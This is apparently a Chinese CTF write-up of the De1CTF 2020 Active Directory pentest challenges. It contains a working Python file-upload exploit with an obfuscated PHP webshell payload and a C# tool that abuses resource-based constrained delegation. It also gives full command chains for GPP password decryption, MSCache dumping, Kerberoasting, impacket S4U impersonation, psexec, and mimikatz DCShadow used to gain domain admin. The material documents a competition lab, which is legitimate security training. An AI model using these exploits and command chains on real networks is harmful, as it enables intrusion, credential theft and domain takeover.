Posted 2020-05-05Updated 2020-07-11web security25 minutes read (About 3751 words)

De1tactf2020 pentest非预期解与预期解

pentest1

先是一个有绕过的文件上传，这部分是其他小伙伴做的直接给exp了。

import requests
import re
import sys

url='http://47.113.219.76/index.php'
headers={
    'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryhJUhA4FiLizuakBx'
}
data="""------WebKitFormBoundaryhJUhA4FiLizuakBx
Content-Disposition: form-data; name="file"; filename="{}"
Content-Type: image/jpeg

{}
------WebKitFormBoundaryhJUhA4FiLizuakBx
Content-Disposition: form-data; name="submit"

submit
------WebKitFormBoundaryhJUhA4FiLizuakBx--"""

payload="""
<?=$_=[]?><?=$_=@"$_"?><?=$_=$_['!'=='@']?>
<?=$_?>
<?=$__=$_?>
<?=$___=$_?>
<?=$____=$_?>
<?=$_____=$_?>
<?=$______=$_?>
<?=$_______=$_?>
<?=$________=$_?>

<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>

<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>

<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>

<?=++$_____?>
<?=++$_____?>
<?=++$_____?>
<?=++$_____?>

<?=++$______?>
<?=++$______?>
<?=++$______?>
<?=++$______?>
<?=++$______?>
<?=++$______?>
<?=++$______?>
<?=++$______?>
<?=++$______?>
<?=++$______?>
<?=++$______?>
<?=++$______?>

<?=++$_______?>
<?=++$_______?>
<?=++$_______?>
<?=++$_______?>
<?=++$_______?>
<?=++$_______?>

<?=$________='_'?>


<?=$_________=$__.$___.$__.$____.$_____.$______?>
<?=$__________=$________.$_______.$_____.$____?>

<?=$____________________=$$__________?>


<?=$____________________[_]($____________________[__],$____________________[___])?>

"""

data=data.format("syc.pHp",payload)

r=requests.post(url=url,headers=headers,data=data)

filename=re.search("in:(uploads/.*)",r.text).group(1)
filename=filename.strip()

print("http://47.113.219.76/"+filename)
r=requests.get("http://47.113.219.76/"+filename+"?_=file_put_contents&__=1.php&___=<?php eval($_POST[a]);?>")

print(r.status_code)
print(r.text)

打完访问对应目录是下的1.php，密码是a。

连上webshell后把shell反弹到cs上，使用powerview进行信息收集可以看到，域内共享有一个hint。

1 2	powershell-import /Users/cengsiqi/Desktop/pentest/wintool/PowerView-dev.ps1 powershell get-domaincomputer\|get-netshare

查看这个Hint可以发现，有一个拿flag的tip。

1	shell dir \\dc.De1CTF2020.lab\Hin

把提示拷贝下来下载发现这个zip需要密码才能打开。

1	shell copy \\dc.De1CTF2020.lab\Hint\flag1_and_flag2hint.zip .

接着收集，域内用户信息发现有一个可疑用户。

1	shell net user /dom

猜测HintZip_Pass账户密码就是解压缩的密码。这里经过一些尝试之后考虑会不会是gpp尝试ps直接导出，发现爆了个错，看意思是说当前用户不是domain user（客观事实是当前账户就是域用户）。

1 2	powershell-import /Users/cengsiqi/Desktop/pentest/Get-GPPPassword.ps1 powershell Get-GPPPassword

也不会改powershell，就直接手动遍历SYSVOL了（还好不是很多，多的话建议弹到msf上用msf的脚本搞）

1
2
3

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="HintZip_Pass" image="2" changed="2020-04-15 14:43:23" uid="{D33537C1-0BDB-44B7-8628-A6030A298430}"><Properties action="U" newName="" fullName="" description="" cpassword="uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08" changeLogon="1" noChange="0" neverExpires="0" acctDisabled="0" userName="HintZip_Pass"/></User>
</Groups>

1	gpp-decrypt uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08

用zL1PpP@sSwO3d解密刚才的压缩包flag1_and_flag2hint.zip即可得到，第一个flag和下一关的提示。

pentest2

flag1: De1CTF{GpP_11Is_SoOOO_Ea3333y}

Get flag2 Hint:
hint1: You need De1ta user to get flag2
hint2: De1ta user's password length is 1-8, and the password is composed of [0-9a-f].
hint3: Pay attention to the extended rights of De1ta user on the domain.
hint4: flag2 in Domain Controller (C:\Users\Administrator\Desktop\flag.txt)

PS: Please do not damage the environment after getting permission, thanks QAQ.

从提示可以看出来，出题的思路是，通过某种离线爆破的方法拿到De1ta密码，De1ta用户存在acl滥用问题以至于可以搞到域控拿下读到C:\Users\Administrator\Desktop\flag.txt。

关于如何离线爆破我这里是非预期，之前服务器web账号有特权可以juicypotato提权。

我一直没成功。

当时有其他师傅成功，给我弹了个system shell。

导出De1ta账户的mscach

reg save hklm\system system.hive
reg save hklm\security security.hive

python secretsdump.py -security /Users/cengsiqi/Desktop/hash/security.hive -system /Users/cengsiqi/Desktop/hash/SYSTEM.hive LOCAL

可以拿到

1	DE1CTF2020.LAB/De1ta:$DCC2$10240#De1ta#52c2cfff23d879a2ba830cf184c10b46

根据提示的密码复杂度，用hascat跑出来结果是3f23ea12。

密码有了下一步根据提示来Delta acl滥用问题。

1 2	powershell-import /Users/cengsiqi/Desktop/pentest/wintool/PowerView-master.ps1 powershell Get-ObjectAcl -Domain De1CTF2020.lab -ResolveGUIDs\|?{$_.IdentityReference -eq "DE1CTF2020\De1ta"}

输出出来了很多东西重点关注两个地方，第一个地方是De1ta的ExtendedRight让他具备Dcshadow的攻击的能力。

通过查阅资料可以知道Dcshadow攻击时需要De1ta这种特权账号和一个SYSTEM账号。做到这里的时候juciypotato已经修了，之前抓的administrator hash也改了。（经验不丰富，如果之前抓了机器hash也能提权了）。

接下来就需要关注第二个地方了。De1ta用户对DM机器具有WriteProperty，环境又是12，所以可以用烂番茄提权。

using System;
using System.Text;
using System.Security.AccessControl;
using System.Security.Principal;
using System.Net;
namespace Addnew_MachineAccount
{
    class Program
    {
        static void Main(string[] args)
        {
            String DomainController = "192.168.0.12";
            String Domain = "De1CTF2020.lab";
            String new_MachineAccount = "lisan4"; //添加的机器账户
            String new_MachineAccount_password = "sycl0ver"; //机器账户密码
            String victimcomputer = "DM"; //需要进行提权的机器
            String victimcomputer_ldap_path = "LDAP://CN=DM,CN=Computers,DC=De1CTF2020,DC=lab";
            String machine_account = new_MachineAccount;
            String sam_account = machine_account + "$";

            String distinguished_name = "";
            String[] DC_array = null;
            distinguished_name = "CN=" + machine_account + ",CN=Computers";
            DC_array = Domain.Split('.');
            foreach (String DC in DC_array)
            {
                distinguished_name += ",DC=" + DC;
            }
            Console.WriteLine("[+] Elevate permissions on " + victimcomputer);
            Console.WriteLine("[+] Domain = " + Domain);
            Console.WriteLine("[+] Domain Controller = " + DomainController);
            //Console.WriteLine("[+] New SAMAccountName = " + sam_account);
            //Console.WriteLine("[+] Distinguished Name = " + distinguished_name);
            //连接ldap
            System.DirectoryServices.Protocols.LdapDirectoryIdentifier identifier = new System.DirectoryServices.Protocols.LdapDirectoryIdentifier(DomainController, 389);
            //NetworkCredential nc = new NetworkCredential(username, password); //使用凭据登录            

            System.DirectoryServices.Protocols.LdapConnection connection = null;
            //connection = new System.DirectoryServices.Protocols.LdapConnection(identifier, nc);
            connection = new System.DirectoryServices.Protocols.LdapConnection(identifier);
            connection.SessionOptions.Sealing = true;
            connection.SessionOptions.Signing = true;
            connection.Bind();
            var request = new System.DirectoryServices.Protocols.AddRequest(distinguished_name, new System.DirectoryServices.Protocols.DirectoryAttribute[] {
                new System.DirectoryServices.Protocols.DirectoryAttribute("DnsHostName", machine_account +"."+ Domain),
                new System.DirectoryServices.Protocols.DirectoryAttribute("SamAccountName", sam_account),
                new System.DirectoryServices.Protocols.DirectoryAttribute("userAccountControl", "4096"),
                new System.DirectoryServices.Protocols.DirectoryAttribute("unicodePwd", Encoding.Unicode.GetBytes("\"" + new_MachineAccount_password + "\"")),
                new System.DirectoryServices.Protocols.DirectoryAttribute("objectClass", "Computer"),
               new System.DirectoryServices.Protocols.DirectoryAttribute("ServicePrincipalName", "HOST/"+machine_account+"."+Domain,"RestrictedKrbHost/"+machine_account+"."+Domain,"HOST/"+machine_account,"RestrictedKrbHost/"+machine_account)
            });
            try
            {
                //添加机器账户
                connection.SendRequest(request);
                Console.WriteLine("[+] Machine account: " + machine_account + " Password: " + new_MachineAccount_password + " added");
            }
            catch (System.Exception ex)
            {
                Console.WriteLine("[-] The new machine could not be created! User may have reached ms-DS-new_MachineAccountQuota limit.)");
                Console.WriteLine("[-] Exception: " + ex.Message);
                return;
            }
            // 获取新计算机对象的SID
            var new_request = new System.DirectoryServices.Protocols.SearchRequest(distinguished_name, "(&(samAccountType=805306369)(|(name=" + machine_account + ")))", System.DirectoryServices.Protocols.SearchScope.Subtree, null);
            var new_response = (System.DirectoryServices.Protocols.SearchResponse)connection.SendRequest(new_request);
            SecurityIdentifier sid = null;
            foreach (System.DirectoryServices.Protocols.SearchResultEntry entry in new_response.Entries)
            {
                try
                {
                    sid = new SecurityIdentifier(entry.Attributes["objectsid"][0] as byte[], 0);
                    Console.Out.WriteLine("[+] " + new_MachineAccount + " SID : " + sid.Value);
                }
                catch
                {
                    Console.WriteLine("[!] It was not possible to retrieve the SID.\nExiting...");
                    return;
                }
            }
            //设置资源约束委派
            System.DirectoryServices.DirectoryEntry myldapConnection = new System.DirectoryServices.DirectoryEntry("De1CTF2020.lab","De1ta", "3f23ea12");

            myldapConnection.Path = victimcomputer_ldap_path;

            myldapConnection.AuthenticationType = System.DirectoryServices.AuthenticationTypes.Secure;
            System.DirectoryServices.DirectorySearcher search = new System.DirectoryServices.DirectorySearcher(myldapConnection);
            //通过ldap找计算机
            search.Filter = "(CN=" + victimcomputer + ")";
            string[] requiredProperties = new string[] { "samaccountname" };
            foreach (String property in requiredProperties)
                search.PropertiesToLoad.Add(property);
            System.DirectoryServices.SearchResult result = null;
            try
            {
                result = search.FindOne();
            }
            catch (System.Exception ex)
            {
                Console.WriteLine(ex.Message + "Exiting...");
                return;
            }
            if (result != null)
            {
                System.DirectoryServices.DirectoryEntry entryToUpdate = result.GetDirectoryEntry();
                String sec_desc = "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;" + sid.Value + ")";
                System.Security.AccessControl.RawSecurityDescriptor sd = new RawSecurityDescriptor(sec_desc);
                byte[] riptor_buffer = new byte[sd.BinaryLength];
                sd.GetBinaryForm(riptor_buffer, 0);
                // 添加evilpc的sid到msds-allowedtoactonbehalfofotheridentity中
                entryToUpdate.Properties["msds-allowedtoactonbehalfofotheridentity"].Value = riptor_buffer;
                try
                {
                    entryToUpdate.CommitChanges();//提交更改
                    Console.WriteLine("[+] Exploit successfully!");
                }
                catch (System.Exception ex)
                {
                    Console.WriteLine(ex.Message);
                    Console.WriteLine("[!] \nFailed...");
                    return;
                }
            }
        }
    }
}

因为环境很混乱几个队伍都在相互覆盖msds-allowedtoactonbehalfofotheridentity，所以先后添加了多个spn。。lisan3$ lisan4$

加上委派之后然后就是s4u提权了。这里踩了大坑，下面来说一下。我先用的kekeo。

1
2

tgt::ask /user:lisan3$ /domain:De1CTF2020.lab /ntlm:30a7b270355d67451970d37ff1c9b666
tgs::s4u /tgt:TGT_lisan3$@DE1CTF2020.LAB_krbtgt~De1CTF2020.lab@DE1CTF2020.LAB.kirbi /user:Administrator@De1CTF2020.lab /service:cifs/DM.De1CTF2020.lab

S4U2self成功S4U2Proxy失败（当时反复确认过委派加上了的）

换个工具rubues

但是dir始终不成功（后来问了一个师傅答复是：访问自己本身默认都是用当前用户身份去认证，不走网络认证，必须得主动调用网络认证才行）。

走到这里天色已晚有点肝不动了，就没继续了。第二天比赛结束出题师傅给我说用impakect就可以s4u而且能成。

proxychains getST.py -hashes 30a7b270355d67451970d37ff1c9b666:30a7b270355d67451970d37ff1c9b666 -spn cifs/dm.De1CTF2020.lab De1CTF2020/lisan4$
export KRB5CCNAME=/root/impacket-master/examples/lisan4$.ccache
proxychains getST.py -hashes 30a7b270355d67451970d37ff1c9b666:30a7b270355d67451970d37ff1c9b666 -k -impersonate Administrator -spn cifs/dm.De1CTF2020.lab De1CTF2020/lisan4$
export KRB5CCNAME=/root/impacket-master/examples/Administrator.ccache
proxychains psexec.py -k -no-pass dm.De1CTF2020.lab

这里一定注意要用fqdn（dm.De1CTF2020.lab）来请求，不要用ip。
这里一定注意要用fqdn（dm.De1CTF2020.lab）来请求，不要用ip。
这里一定注意要用fqdn（dm.De1CTF2020.lab）来请求，不要用ip。

有system权限后就是Dcshadow的操作了

system权限下

1	shell mimikatz.exe "!+" "!processtoken" "lsadump::dcshadow /object:de1ta /attribute:primaryGroupID /value:512"

我一直以为这种非交互式的mimkatz运行完会被beacon自动关闭掉，实际测下来并不会。

De1ta权限下

1	shell mimikatz.exe "lsadump::dcshadow /push" "exit"

执行完后system那边会有反应

1	shell net group "domain admins" /domain

会发现加上了

照理可以直接dir了但是最后还是有一个莫名其妙的坑（忽视图中把路径写错了，不过不影响这里的意思就是没权限，路径不存在是另外一个报错）

用rubues重新来一次tgt就好了

1 2	shell Rubeus.exe asktgt /user:de1ta /rc4:B03094996601324646AC223BF30D0D07 /domain:de1ctf2020.lab /ptt shell type \\dc\c$\users\Administrator\Desktop\flag.txt

来说说预期解拿到De1ta账号密码

1	shell setspn -s http/DM.De1CTF2020.lab De1CTF2020\De1ta

1	shell cscript GetUserSPNs.vbs

1 2	powershell-import /Users/cengsiqi/Desktop/pentest/Empire/data/module_source/credentials/Invoke-Kerberoast.ps1 powershell Invoke-Kerberoast

TicketByteHexStream  : 
Hash                 : $krb5tgs$http/DM.De1CTF2020.lab:0B5E0028717C31BF16F95DDF
                       CA441A51$A71E43FD37E2E10E3029FE2767B0266CCABE13F68B27A46
                       955A440DA3F3B4AF1D4C7A8C357B69655364C27DA73C80FBE9075A94
                       615EB720E7A3E1E8610A1C18962338E87479D0A17D902B904B4DE4B5
                       AD3BAE015D3709899570BD6D25392C9E98345535523CCBE65125B0E7
                       1F2482040F2347DD13B7062B8A9E6DAA5C79F2843A2F030BBA0DCA91
                       8FFEEE32D61BCAF4453315AAED98A427CF843C71EDB3EFBD2F47EF83
                       9229E51A6A10A9D180B6EAF698B9C5D446F61BCA21E59413EC380A3F
                       426F941EA42704B7262812E44FA1F04F05DAFF0E06B5690538D3BB8B
                       10263FE97E05D6FE9F9E5BF1EFFF6A0344FA8F8B20CC0AA39BF95538
                       4C3B543BF9B9A4E23C8F071D24E846F284A6FE62278E76ED47897FB2
                       3264CC57A7EDE8C613EAD87914C511F2554AAEA6F663E66B8BA0760C
                       296F82253303A5FF2DF5F8343AD2097F57B376BF83C302D806D620B9
                       8ED2D3C53DF65AE37A7D6356EFC1A9123CCF56549A5288C132E3F5D0
                       5A066CE50FFCB654BF79FD5F673175F9AD98C1140E8B50D0F574080A
                       48EADBFBB00668B96A79F95E429CC42B4BD3CA2C9A106CD6D39312D9
                       BD13B4452861E47DD71F36D3DAD4A570480D56BDEF1F278518219FA2
                       5D076758B994C5F4EC8CF49C85DA1CFFAC91DF63AB5D71EF5135CD36
                       D54FCB9C2A9EF61D67A3BC01EF668F255A66487F3493BE0F8352EAFF
                       A009D561BE459F1130C6A3AF81060FD82232B3E430A196C5580FBDBB
                       3EEAC6AA6FD2774063CB16C1CB161B20CD6ED3BF414349DECCCF8753
                       9CE1EEBC28DD27DCE32752640F22817286211841DE22191300D75970
                       D721021FA1211FA368A14EACEBABA5B42B1F3B087CE04782A695F046
                       1CCCDC1445DE56D31582825E2824E47499C91A396D867A4284C4DD40
                       AD1E1AF7A2073729FCB66A52C076A7F3515C93F54189CBDAAF408838
                       736CA682CFF82CBA4DBFF757CD297CC16FF0A8F6F7C9F206ACB5BB87
                       61C54AD1635572C16E6FC01B40E6F84F71153514EA21A87B28358A38
                       4B3ECA5206F35EE3732DADE97726E07E8FEBE3D7EE3A77A2A4EEE1BE
                       59F4EC5336E4F65D2A4F111C79A73D24F9BDFCCBEAEAC5768538EFAD
                       00A191BB7941DF4A441BB83D061D42CB59D03A61921117DB835AA1D0
                       DEB00AD6BC4A694CC39A465CF23447D7CDB1F19EBFCB92C555E75CE6
                       7999B76A4FE22D1D34AF706A1505DC027D8BDC8A0055095605255BB8
                       F437551248B77A559463C39934A6A95F183DD1FF5C4152949C0B6F69
                       6C4B6A649A4B207CE4202B8884F54C1BC9ECA86F966EF2B86F3A89D3
                       1E07C880C5E5DBCD35338FB485A46E74779D45BF38E2398A16377C15
                       43E32DACFF71713DBF7288640AA751FC5A51B8DF873BBEB1F946331C
                       CF59E6FC4209322D9BCAB8C51F5B408545BA9C4DA11755B4477DF968
                       90F72E86D900D78BE6006BD14E1380725D1D8
SamAccountName       : De1ta
DistinguishedName    : CN=De1ta,CN=Users,DC=De1CTF2020,DC=lab
ServicePrincipalName : http/DM.De1CTF2020.lab

1	hashcat -m 13100 -a 0 kerberos.txt cracks.txt

ps：用ps也可以GetSPNUser

1 2	powershell-import /Users/cengsiqi/Desktop/pentest/wintool/kerberoast/GetUserSPNs.ps1 powershell GetUserSPNs

De1tactf2020 pentest非预期解与预期解

https://cl0und.github.io/2020/05/05/De1tactf2020-pentest非预期解与预期解/

Author

李三（cl0und）

Posted on

2020-05-05

Updated on

2020-07-11

Licensed under

#ctf

De1tactf2020 pentest非预期解与预期解

pentest1

pentest2

来说说预期解拿到De1ta账号密码

Author

Posted on

Updated on

Licensed under

Categories

Recents

Archives

Tags

Catalogue